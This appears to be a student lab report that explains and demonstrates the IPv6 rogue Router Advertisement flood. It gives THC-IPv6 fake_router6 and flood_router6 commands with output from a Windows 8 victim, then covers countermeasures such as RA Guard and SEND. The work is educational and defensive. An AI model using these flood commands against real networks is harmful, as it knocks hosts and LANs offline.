IPv6 Rogue Router Advertisement Attack Prepared By: Andrew Gray & Wil Hall Prepared For: Dr. Tom Calabrese

Transcription

1 IPv6 Rogue Router Advertisement Attack Prepared By: Andrew Gray & Wil Hall Prepared For: Dr. Tom Calabrese

2 Table of Contents Where is IPv6?... 3 IPv6 Neighbor Discovery Protocol (NDP)... 4 Why NDP is Insecure... 6 Instructions: Installing IPv6 on Windows XP... 9 Issuing Router Advertisement Floods Getting Started Faking a Router Advertisement Message Issuing a Router Advertisement Flood Behind the Scenes Countermeasures Cisco Smart ports SEcure Neighbor Discovery and IPsec Disable IPv Cisco switch with RA Guard... 24

3 Where is IPv6? Although IPv6 has not yet replaced IPv4, there are a large number of devices and systems that come IPv6 enabled out of the box. To name a few: Windows (Since Vista, Including mobile) Mac OS X (Since v10.3) Apple ios (Since v6.1) Most versions of Linux & BSD Android (Since v2.1) With almost all of the popular systems being IPv6 enabled by default, there is no doubt that a large number of them will never be properly secured. The danger lies in the fact that users and businesses may be unaware of the threats related to IPv6, or even that they have IPv6. Professionals who are not knowledgeable about IPv6 may not be able to properly secure IPv6 networks, or know to disable it when it is not being used. It turns out that Windows systems are the most vulnerable (compared to Mac OS X, Linux, etc) to IPv6 Router Advertisement attacks, which we will be discussing both in this document, and in our video. As side note, Andrew and I took a trip to the windows store in the mall to see if their employees were aware that IPv6 could be a possible danger, due to many new attacks. The employees there struggled with the question Does Windows 8 and the Surface Pro tablets come with IPv6 enabled? because they didn t actually know what IPv6 was. All versions of Windows 8, including mobile versions, come with IPv6 enabled and configured to use IPv6 Neighbor Discovery Protocol (NDP), which is the basis for many IPv6 attacks. Unlike Mac OS X, Linux, BSD and the like, the Windows operating system has not improved the security of its IPv6 implementation since Windows XP, leaving Windows 8 just as vulnerable as Windows systems years before it. With so many Windows 8 systems going onto the market IPv6 enabled, and the use (and misuse) of IPv6 on the rise, people should be more aware of the risks. A good start would be for people to understand what IPv6 is.

4 IPv6 Neighbor Discovery Protocol (NDP) IPv6 Neighbor Discovery Protocol (NDP, RFC#4861) operates over Internet Control Message Protocol (ICMPv6, RFC#4443) and allows IPv6 nodes on a LAN to discover each other s presence, determine each other s link-layer addresses, and discover routers on the LAN. The two types of NDP messages relevant to this attack are Router Solicitation (RS) messages and Router Advertisement (RA) messages, which are both used for IPv6 router discovery. Router Solicitation messages are sent by host machines to the allrouters multicast address in order to propagate a list of routers on the LAN network. Typically, RS messages are sent by hosts when: The host starts up or restarts The host first connects or reconnects to the LAN The following is the format of an ICMPv6 RS message: Type (133) Code (0) Checksum Reserved Options... When a router receives an RS message, it responds to the sender of the RS message with a Router Advertisement message, which contains information about its link local address and information related to DHCPv6 (RFC#3315). In addition to being sent in response to RS messages, RA messages are also sent by all routers periodically to the all-nodes multicast address to keep all nodes up to date. Below is the format of an ICMPv6 RA message:

5 Type (134) Code (0) Checksum Cur Hop Limit M O Reserved Router Lifetime Reachable Time Retrans Timer Options... Field Descriptions: Cur Hop limit Corresponds to the Hop Limit in the IP header. Always 255 for RA messages (because they are link local messages only) M Flag Managed address configuration, When set, indicates that addresses are available via DHCPv6 O Flag Other configuration, When set, indicates that other configuration is available via DHCPv6, I.e. DNS Router Lifetime, Reachable Time, Retrans Timer Used in the Neighbor Unreachability Detection Algorithm Most importantly, nodes receiving RA messages derive the source address of the router from the IPv6 header. The node than assigns itself both a public and temporary IPv6 address for that router (or retrieves one via DHCPv6).

6 Why NDP is Insecure NDP is an insecure protocol, because it is very easy to create and send rogue RS and RA packets, creating massive disturbances to a LAN network. There are two forms of DOS attacks possible using RS and RA messages. The first involves sending rogue RS messages to one or more routers, causing those routers to DOS other nodes on the network. The following diagram is a simple example of this form of DOS attack: N1 receives a flood of unwanted Router Advertisement messages from R1. The attack isn't traceable back to N3, because the messages all appear to be originating from N1 or R1. R1 N3 Sends a flood of rogue Router Solicitation Messages to R1, faking the IPv6 source address to be N1's address. R1 unknowingly performs a DOS against N1. N1 N3 N2 There are a few downfalls to the above attack. First of all, it is only as effective as any other simple packet flood. Since all the RA messages are from the same router, they are disregarded after being read because N1 already knows about R1. It also requires that R1 is IPv6 enabled. The second form, as shown below, is much more effective:

7 R1 N1 receives a flood of Router Advertisement messages, but assumes they are all legitimate. N1 receives and processes them all. N1 N3 Sends a flood of rogue Router Advertisement messages to N1, all with random IPv6 source addresses. N3 N2 In this form of the attack, it doesn t matter if R1 supports IPv6 because messages are sent directly over the LAN. In addition, by randomizing the source address of RA packets sent to N1, N1 no longer disregards them, but rather processes every single one. This means that for every Router Advertisement received, N1 assigns itself both a temporary and public link local address. During a flood of RA packets to a vulnerable IPv6 host, CPU usage averages between %, and the operating system residing on the host is barely usable, because it is hung up at a very low level processing all of the incoming traffic. In addition to this, the NDP RFC permits sending RA messages to the broadcast address, meaning that one host issuing rogue RA messages can cripple any vulnerable devices on the network all at once:

8 R1 N3 Sends a flood of rogue Router Advertisement messages to the broadcast address, all with random IPv6 source addresses. N1 N3 R1, N1, and N2 all receive the flood of rogue RA messages. Those who are vulnerable receive and process all the RA messages. N2 The severity of this attack varies depending on the victim s operating system. Currently, Windows XP, Windows 7, Windows 8 (including mobile versions), and some flavors of BSD fail to provide any protection against this sort of attack. Thus, hosts running these operating systems are rendered unusable during attack.

9 Instructions: Installing IPv6 on Windows XP IPv6 is automatically enabled and configured for all major operating systems: Windows, Vista/7/8, Mac OS X, and most flavors of Linux & BSD. Windows XP also has support for IPv6, but it must be installed manually. To install it, open a command prompt and issue the following commands. Confirm that you do not have an IPv6 Address: C:\Documents and Settings\Administrator>ipconfig /all Windows IP Configuration Host Name : wilhall06d4 Primary Dns Suffix : Node Type : Unknown IP Routing Enabled : No WINS Proxy Enabled : No DNS Suffix Search List : localdomain Ethernet adapter Local Area Connection: Connection- specific DNS Suffix. : localdomain Description : Parallels Ethernet Adapter Physical Address : 00-1C F Dhcp Enabled : Yes Autoconfiguration Enabled.... : Yes IP Address : Subnet Mask : Default Gateway : DHCP Server : DNS Servers : Lease Obtained : Monday, April 29, :13:51 AM Lease Expires : Monday, April 29, :43:51 AM Install IPv6. This command may take a minute to complete: C:\Documents and Settings\Administrator>netsh int ipv6 install

10 Ok. IPv6 is now installed and configured to use stateless auto configuration, meaning that each host determines its own IPv6 addresses from the contents of Router Advertisement messages. This configuration is preferred in the absence of a DHCPv6 server. Verify that you have an IPv6 address: C:\Documents and Settings\Administrator>ipconfig /all Windows IP Configuration Host Name : wilhall06d4 Primary Dns Suffix : Node Type : Unknown IP Routing Enabled : No WINS Proxy Enabled : No DNS Suffix Search List : localdomain Ethernet adapter Local Area Connection: Connection- specific DNS Suffix. : localdomain Description : Parallels Ethernet Adapter Physical Address : 00-1C F Dhcp Enabled : Yes Autoconfiguration Enabled.... : Yes IP Address : Subnet Mask : IP Address : fdb2:2c26:f4e4:0:cc12:c894:2735:963e IP Address : fdb2:2c26:f4e4:0:21c:42ff:fe89:396f IP Address : fe80::21c:42ff:fe89:396f%5 Default Gateway : DHCP Server : DNS Servers : fec0:0:0:ffff::1%1 fec0:0:0:ffff::2%1 fec0:0:0:ffff::3%1 Lease Obtained : Monday, April 29, :13:51 AM Lease Expires : Monday, April 29, :43:51 AM

11 The ipconfig command doesn t give us a lot of IPv6 specific information. For more information, the following commands are available to you after installing and configuring IPv6. An IPv6 version of ipconfig: C:\Documents and Settings\Administrator>ipv6 if Interface 5: Ethernet: Local Area Connection Guid {E4A07B92-98B5-48A4- B229- A62526E93005} uses Neighbor Discovery uses Router Discovery link- layer address: 00-1c f preferred global fdb2:2c26:f4e4:0:cc12:c894:2735:963e, life 6d23h54m47s/23h5 2m (temporary) preferred global fdb2:2c26:f4e4:0:21c:42ff:fe89:396f, life 29d23h58m10s/6d23 h58m10s (public) preferred link- local fe80::21c:42ff:fe89:396f, life infinite multicast interface- local ff01::1, 1 refs, not reportable multicast link- local ff02::1, 1 refs, not reportable multicast link- local ff02::1:ff89:396f, 2 refs, last reporter multicast link- local ff02::1:ff35:963e, 1 refs, last reporter link MTU 1500 (true link MTU 1500) current hop limit 128 reachable time 32000ms (base 30000ms) retransmission interval 1000ms DAD transmits 1 default site prefix length 48 List information about IPv6 enabled interfaces: C:\Documents and Settings\Administrator>netsh interface ipv6 show interface Querying active state... Idx Met MTU State Name Connected Local Area Connection

12 List information about IPv6 addresses: C:\Documents and Settings\Administrator>netsh interface ipv6 show address Querying active state... Interface 5: Local Area Connection Addr Type DAD State Valid Life Pref. Life Address Temporary Preferred 6d23h50m20s 23h47m33s fdb2:2c26:f4e4:0:cc12:c894:2735: 963e Public Preferred 29d23h53m42s 6d23h53m42s fdb2:2c26:f4e4:0:21c:42ff:fe89:3 96f And finally, to uninstall IPv6: C:\Documents and Settings\Administrator>netsh int ipv6 uninstall A reboot is required to complete this action.

13 Issuing Router Advertisement Floods In our video, we demonstrate the usage of the tools included in the THC-IPv6 attack suite by van Hauser, included in Backtrack 5. This suite contains tools to issue various IPv6 scans, DOS attacks, generate fake IPv6 traffic, and much more. Many of the tools take advantage of vulnerabilities in the IPv6 Neighbor Discovery Protocol (NDP). Getting Started To get started using the THC-IPv6 attack suite, cd into the local bin directory, where you can see a list of the available tools: root@bt:~# cd /usr/local/bin/ root@bt:/usr/local/bin# ls... lots of stuff... Not all of the tools listed are part of the THC-IPv6 attack suite; for a list of (most) of the ones that are, see the official README ( We will be focusing on two of the tools, fake_router6 and flood_router6. Faking a Router Advertisement Message The basis for a router advertisement flood attack is of course fake router advertisements. The first attack we will look at does just that sends a single fake IPv6 router advertisement message to the broadcast address, with the address specified. To issue the attack, first find the interface you want to run the attack on: root@bt:/usr/local/bin# ifconfig eth0 Link encap:ethernet HWaddr 00:1c:42:ec:e3:07 inet addr: Bcast: Mask:

14 inet6 addr: fdb2:2c26:f4e4:0:21c:42ff:feec:e307/64 Scope:Global inet6 addr: fe80::21c:42ff:feec:e307/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:218 errors:0 dropped:0 overruns:0 frame:0 TX packets:20 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:25301 (25.3 KB) TX bytes:2098 (2.0 KB) My only interface is my Ethernet interface, so I m going to run the attack on eth0. Next, issue the attack by running the fake_router6 tool: root@bt:/usr/local/bin#./fake_router6 eth0 bad:ad::/64 Starting to advertise router bad:ad:: (Press Control- C to end)... ^C The tool will continuously run and periodically advertise the fake address you chose (bad:ad::/64) as a router to the broadcast address on the interface you chose (eth0). Press Ctrl+C to stop the script; it should only need to run for a couple of seconds. Any other IPv6-enabled machines on the network while this attack took pace will have been tricked into creating IPv6 addresses for themselves to match the fake router s IPv6 address. For example, here is the result on my Windows 8 machine after issuing the attack: C:\Users\wil\Desktop>ipconfig Windows IP Configuration Ethernet adapter Ethernet 2: Connection- specific DNS Suffix. : localdomain IPv6 Address : bad:ad::ec17:abf1:5126:671d IPv6 Address : fdb2:2c26:f4e4:0:ec17:abf1:5126:671d Temporary IPv6 Address : bad:ad::4417:ae77:4b06:6cc0 Temporary IPv6 Address : fdb2:2c26:f4e4:0:4417:ae77:4b06:6cc0 Link- local IPv6 Address..... : fe80::ec17:abf1:5126:671d%18 IPv4 Address : Subnet Mask : Default Gateway : fe80::21c:42ff:feec:e307%

15 Notice that in addition to its IPv6 addresses for the real router (fdb2*) it has also created addresses based off the fake router advertisement we just sent (bad:ad::*). This is the correct behavior when an IPv6 enabled machine receives a router advertisement; it is meant as an alternative to DHCPv6, and is enabled by default on almost all IPv6 devices. The issue comes when we issue a flood of these fake IPv6 router advertisements, forcing machines on the network who don t know any better to accept and process them all. Issuing a Router Advertisement Flood Issuing a router advertisement flood is just as easy as sending a single router advertisement packet. Assuming we are using the same interface, run the flood_router6 tool: root@bt:/usr/local/bin#./flood_router6 eth0 Starting to flood network with router advertisements on eth0 (Press Control- C to end, a dot is printed for every 100 packet):...^c Notice that we didn t specify an address to advertise this time. This is because the flood_router6 tool creates and sends router advertisements with random addresses. When you run the tool, it will run continuously; press Ctrl+C to stop it. I stopped the attack fairly quickly, because each dot that is printed is 100 router advertisements sent. During this attack, any IPv6-enabled Windows machines on the network will become almost unusable. In addition to the network effects of any DOS attack, Windows machines will hang at 100% CPU usage trying to process all the incoming packets. Other systems such as Mac OS X, Linux, and most versions of BSD know better, and have a simple defense: ignore any router advertisements for a period of time after receiving an unreasonable flood of them. If I take a look at my Windows 8 machine, though, we can see it fell for all of the fake router advertisements:

16 C:\Users\wil\Desktop>ipconfig Windows IP Configuration Ethernet adapter Ethernet 2: Connection- specific DNS Suffix. : localdomain IPv6 Address... : bad:ad::ec17:abf1:5126:671d IPv6 Address... : 2a01:15d:71b1:6083:ec17:abf1:5126:671d IPv6 Address... : 2a01:1b5:a689:3d13:ec17:abf1:5126:671d IPv6 Address... : 2a01:565:f55c:1dce:ec17:abf1:5126:671d... IPv6 Address... : 2a01:f849:35b2:b449:ec17:abf1:5126:671d IPv6 Address... : 2a01:f972:8e2c:5a7d:ec17:abf1:5126:671d IPv6 Address... : 2a01:fecf:a9d4:406:ec17:abf1:5126:671d IPv6 Address... : fdb2:2c26:f4e4:0:ec17:abf1:5126:671d Temporary IPv6 Address.. : bad:ad::4417:ae77:4b06:6cc0 Temporary IPv6 Address.. : 2a01:15d:71b1:6083:4417:ae77:4b06:6cc0 Temporary IPv6 Address.. : 2a01:1b5:a689:3d13:4417:ae77:4b06:6cc0 Temporary IPv6 Address.. : 2a01:565:f55c:1dce:4417:ae77:4b06:6cc0... Temporary IPv6 Address.. : 2a01:f671:f544:b920:4417:ae77:4b06:6cc0 Temporary IPv6 Address.. : 2a01:f849:35b2:b449:4417:ae77:4b06:6cc0 Temporary IPv6 Address.. : 2a01:f972:8e2c:5a7d:4417:ae77:4b06:6cc0 Temporary IPv6 Address.. : 2a01:fecf:a9d4:406:4417:ae77:4b06:6cc0 Temporary IPv6 Address.. : fdb2:2c26:f4e4:0:4417:ae77:4b06:6cc0 Link- local IPv6 Address. : fe80::ec17:abf1:5126:671d%18 IPv4 Address... : Subnet Mask... : Default Gateway. : fe80::21c:42ff:feec:e307%18 fe80::218:85ff:fecf:fc0e%18 fe80::218:18ff:febe:d30%18 fe80::218:7bff:fe19:7ec4%18... fe80::218:e4ff:fec1:887d%18 fe80::218:6bff:fe51:bf1b%18 fe80::218:e8ff:fe8c:384a%18 fe80::218:a2ff:feee:582b% The above lists go on for pages and pages of addresses; I omitted most of them for brevity.

17 Behind the Scenes What s going on behind the scenes is just as simple. In previous sections, we looked at the format of a router advertisement packet. Since it is a standalone message, which doesn t require a reply or any sort of session identifiers such as with TCP, it is very simple to fake, as we have seen. Here we will take a closer at the packets generated from the previous attacks using Wireshark. All of the fake router advertisement packets basically look the same, but with random source addresses. Below is one of many packets sent in the previously mentioned flood attack:

18 The above packet meets the very lax validation checks specified in the NDP RFC: ICMPv6 Code of 0 Valid ICMP Checksum ICMP length > 16 octets IP Hop Limit of 255 All included options > 0 bytes

19 Countermeasures Cisco Smart ports Cisco Smart ports are a viable to protect your network against IPv6 Advertisement DOS. Smart ports allow the individual configuration to each every port on the switch. Ports can be designated as Desktop, Switch, Router and etc. If Smarts Ports are turned on the IPv6 Advertisement attack will not to be able to transmit over the network. The reason the Smarts ports disable this attack is because when smarts is fully configured, each port will represent what it s hooked up too which is explained in figure A. So if we look at our attack we are pretending to be a router and if we are not connected to a port that is assigned to either a router or other profile our attack will not work. Figure A Although Smarts port provides a good way to secure yourself from this kind of attack you can easily get around it. You can get around this by changing the configuration on the switch or find where the router ports and connect there to execute the attack.

20 SEcure Neighbor Discovery and IPsec Encryption and non-repudiation is another way to prevent the IPv6 flood attack. There are two ways to implement encryption and nonrepudiation and those are SEcure Neighbor Discovery Protocol and IPsec. Originally the Neighbor discovery Protocol required the use of IPsec to protect its messages but since RFC s don t give information for how to configure it, the manual configuration can get to be very difficult and impractical to implement. [RFC3971] SEcure Neighbor Discovers Protocol has a very well detailed RFC for the configuration for protection of advertisement messages. SEND uses certification paths, anchored on trusted parties which certify the authority of routers and utilizes four options which are Cryptographically Generated Addresses, RSA signature, Timestamp and nonce.[rfc3971] Cryptographically generated addresses make sure that sender of a ND messages is the owner of the claimed address and this happens through a private/public key exchange. CGA Parameters which is located in figure D provides the method for securely associating a cryptographic public key with an IPv6 address defines which is further explained in [RFC3972]. Figure B

21 The RSA signature public key-based signatures are attached to NDP messages with a 128 SHA-1 key hash. The signature is generated with the RSASSA-PKCS1-v1_5 algorithm and SHA-1 hash. [RFC3971] Figure C The Time stamp option is to make sure that unsolicited advertisements and redirects have not been replayed. [RFC3971] Figure D

22 The nonce makes sure that the Router advertisement is a fresh response to a solicitation sent earlier by the node. [RFC3971] Figure E

23 Disable IPv6 Another way to keep you safe from this attack is to simply disable IPv6. To disable IPv6 you must be on a system that has does not have IPv6 preinstalled and you must enter a command in the command prompt which is displayed below in figure B. You can also disable IPv6 through the switch to prevent the transmission of IPv6 flood attacks on the switch. Figure F Although disabling IPv6 on your computer or switch will prevent you from getting IPv6 flood attacks it not really a solution to this dos attack problem.

24 Cisco switch with RA Guard RA Guard is a solution framework that is capable of identifies invalid Router Advertisement and blocking them. RA Guard can be implemented able where IPv6 end-devices traverse controlled L2 networked devices. In doing this RA Guard allows or denies Router Advertisement based certain criteria, where RA is disallowed on certain interfaces to RA allowed from pre-defined sources. [RFC 6105] Figure G There are three modes that RA Guard uses Stateless, Stateful and SEND-Based. Stateless RA-Guard analysis incoming RAs and decides whether to allow or deny them based solely on information found in the packet or in the switch configuration. Stateful RA-Guard learns dynamically whether certain interfaces are allowed to have to send out router advertisements or not. A SEND-Based RA-Guard simulates that SEND protocol to the point where it verify Cryptographically Generated Address and RSA signature and establishes trust establishes trust anchor certificates. [RFC 6105]